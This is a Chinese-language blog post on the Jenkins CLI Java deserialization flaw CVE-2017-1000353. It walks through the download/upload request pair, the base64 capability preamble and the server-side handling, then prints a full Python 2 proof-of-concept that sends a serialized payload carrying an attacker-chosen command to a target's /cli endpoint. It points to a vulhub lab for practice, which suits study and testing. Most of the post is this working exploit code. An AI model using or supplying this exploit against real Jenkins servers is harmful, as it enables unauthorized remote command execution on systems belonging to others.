jenkins 反序列化漏洞 cve-2017-1000353

淩亂°似流年 2021-08-31 02:59 558阅读 0赞

一、漏洞原理：

首先这是一个java反序列化漏洞，一定是command在序列化信息中，反序列化时候直接执行了该命令。

攻击过程学习：

下文的session是一个uuid，类型4

# 可以如下生成
    session = uuid.uuid4()

1、首先要发送一个请求，是一个下载请求。这个请求是要启动一个双向数据传输频道。频道的标识就是session。而side字段则是用来标识传输方向

![format_png][]

对应代码段：

def Download(url,session):
        headers = {'Side':'download'}
        headers['Content-type'] = 'application/x-www-form-urlencoded'
        headers['Session'] = session
        headers['Transfer-Encoding'] = 'chunked'
        try:
            response = requests.post(url,data=Null_Payload(),headers=headers,proxies=Proxy,stream=True)
        except Exception,ex:
            print ex
            exit(0)
        print response.content

然后是第二个请求：双向信道发送组件，第一个请求被阻塞，一直到第二个请求被发送。此时session与之前保持一致，side改成upload。

![format_png 1][]

数据部分格式规范如下：

（1）前导码

前导码包含一个base64编码的序列化对象。“ *能力* ” 类型的序列化对象只是告诉服务器  
客户端具有哪些能力（例如HTTP 分块编码）。

Premle='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='

（2）Proto部分 （可能是所说的额外字节）

Proto = 'x00x00x00x00'

（3）payload部分

在前导码和一些额外的字节之后，Jenkins服务器期望类型为Command的序列化对象。由于Jenkins不验证序列化对象，所以可以发送任何序列化对象。

def Payload_Init(command):
        global File_Serialization
        command = "java -jar jenkins_payload.jar payload.ser '%s'"%str(command)
        print command
        return_number = os.system(command)
        if return_number != 0:
            print "Call Jar Packet To Init The Payload Error"
            exit(0)
        File_Serialization = open("./payload.ser","rb").read()

所有第二个数据包发送的数据整合：

def Create_Payload_Chunked():
        yield Premle
        yield Proto
        yield File_Serialization

发送第二个数据包：

def Upload_Chunked(url,session,data):
        headers = {'Side':'upload'}
        headers['Session'] = session
        headers['Content-type'] = 'application/octet-stream'
        headers['Accept-Encoding'] = None
        headers['Transfer-Encoding'] = 'chunked'
        headers['Cache-Control'] = 'no-cache'
        try:    
            response = requests.post(url,headers=headers,data=Create_Payload_Chunked(),proxies=Proxy)
        except Exception,ex:
            print ex
            exit(0)

整个攻击流程

def Attack():
        print "start"
        session = str(uuid.uuid4())
        thread_object = threading.Thread(target=Download,args=(Target,session))
        thread_object.start()
        time.sleep(1)
        print "pwn"
        #Upload(URL, session, create_payload())
        Upload_Chunked(Target,session,"asdf")

服务器端对应处理

反序列化command对象

![format_png 2][]

然后这个方法在这里被调用

![format_png 3][]

返回了这个序列化好的对象cmd

read方法调用，把返回的对象赋值给了cmd，也就是被读进一个ReaderThread类型的线程。

![format_png 4][]

该线程由类“ *CliEndpointResponse* ”中调用的“ *upload* ”方法触发。

![format_png 5][]

在该方法中，HTTP主体数据被读取，并且调用“notify”方法来通知线程。

![format_png 6][]

整体POC

import os
    import uuid
    import gzip
    import zlib
    import time
    import urllib
    import socket
    import urllib3
    import requests
    import threading
    from optparse import OptionParser
    
    #全局变量定义：
    #Proxy = {"http":"http://127.0.0.1:8090","https":"http://127.0.0.1:8090"}#HTTP、HTTPS协议代理设置
    Proxy = None#HTTP、HTTPS协议代理设置
    Target="http://%s:8080/cli"#攻击目标
    Premle='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
    Proto = 'x00x00x00x00'
    File_Serialization = None
    socket.setdefaulttimeout(3)
    
    
    #全局函数定义
    def Payload_Init(command):
        global File_Serialization
        command = "java -jar jenkins_payload.jar payload.ser '%s'"%str(command)
        print command
        return_number = os.system(command)
        if return_number != 0:
            print "Call Jar Packet To Init The Payload Error"
            exit(0)
        File_Serialization = open("./payload.ser","rb").read()
    
    def Download(url,session):
        headers = {'Side':'download'}
        headers['Content-type'] = 'application/x-www-form-urlencoded'
        headers['Session'] = session
        headers['Transfer-Encoding'] = 'chunked'
        try:
            response = requests.post(url,data=Null_Payload(),headers=headers,proxies=Proxy,stream=True)
        except Exception,ex:
            print ex
            exit(0)
        print response.content
    
    '''
    def Upload(url,session,data):
        headers = {'Side':'upload'}
        headers['Session'] = session
        headers['Content-type'] = 'application/octet-stream'
        headers['Accept-Encoding'] = None
        try:
            response = requests.post(url,data=data,headers=headers,proxies=Proxy)
        except Exception,ex:
            print ex
            exit(0)
    '''
    
    def Upload_Chunked(url,session,data):
        headers = {'Side':'upload'}
        headers['Session'] = session
        headers['Content-type'] = 'application/octet-stream'
        headers['Accept-Encoding'] = None
        headers['Transfer-Encoding'] = 'chunked'
        headers['Cache-Control'] = 'no-cache'
        try:
            response = requests.post(url,headers=headers,data=Create_Payload_Chunked(),proxies=Proxy)
        except Exception,ex:
            print ex
            exit(0)
    
    def Null_Payload():
        yield " "
    
    """
    def Create_Payload():
        payload = Premle + Proto + File_Serialization
        return payload
    
    """
    
    def Create_Payload_Chunked():
        yield Premle
        yield Proto
        yield File_Serialization
    
    def Attack():
        print "start"
        session = str(uuid.uuid4())
        thread_object = threading.Thread(target=Download,args=(Target,session))
        thread_object.start()
        time.sleep(1)
        print "pwn"
        #Upload(URL, session, create_payload())
        Upload_Chunked(Target,session,"asdf")
    
    #程序入口
    if __name__ == "__main__":
        parser = OptionParser()
        parser.add_option("-t","--target",dest="target",help="Target IP address!")
        parser.add_option("-c","--command",dest="command",help="The command to execute!")
        parser.add_option("-p","--protocol",dest="protocol",help="Protocl is HTTP or HTTPS!")
        (options, args) = parser.parse_args()
        optionslist = [options.target,options.command,options.protocol]
        if None in optionslist or "" in optionslist:
            print "Please check your input parameters!"
        Target = Target%options.target
        command = options.command
        protocol = options.protocol
        if protocol == "HTTP":
            pass
        elif protocol == "HTTPS":
            Target = Target.replace("http","https")
        else:
            print "Unknown Protocol!"
        Payload_Init(command)
        Attack()

靶机平台：

[https://vulhub.org/\#/environments/jenkins/CVE-2017-1000353/][https_vulhub.org_environments_jenkins_CVE-2017-1000353]

poc：

[https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py][https_github.com_vulhub_CVE-2017-1000353_blob_master_exploit.py]

[format_png]: /images/20210728/672b8e045b5b4bf88d563d8d17bbc190.png
[format_png 1]: /images/20210728/c4d29a7657f54be687a276f322a6859f.png
[format_png 2]: /images/20210728/13d5e751bd1b4f70ad9d1022b00f71e0.png
[format_png 3]: https://imgconvert.csdnimg.cn/aHR0cHM6Ly9pbWFnZXMyMDE3LmNuYmxvZ3MuY29tL2Jsb2cvMTA3MDMyMS8yMDE3MTIvMTA3MDMyMS0yMDE3MTIxMzE1NTMzODMxNi0yMDkxMDk2Nzk5LnBuZw?x-oss-process=image/format,png
[format_png 4]: https://imgconvert.csdnimg.cn/aHR0cHM6Ly9pbWFnZXMyMDE3LmNuYmxvZ3MuY29tL2Jsb2cvMTA3MDMyMS8yMDE3MTIvMTA3MDMyMS0yMDE3MTIxMzE1NTU1OTU5Ny0xNDA1NTgzMTkucG5n?x-oss-process=image/format,png
[format_png 5]: /images/20210728/b6e40974347d42d9af319a7ae6ea263b.png
[format_png 6]: /images/20210728/97238bdd86f14359aeee55131dae608c.png
[https_vulhub.org_environments_jenkins_CVE-2017-1000353]: https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/
[https_github.com_vulhub_CVE-2017-1000353_blob_master_exploit.py]: https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py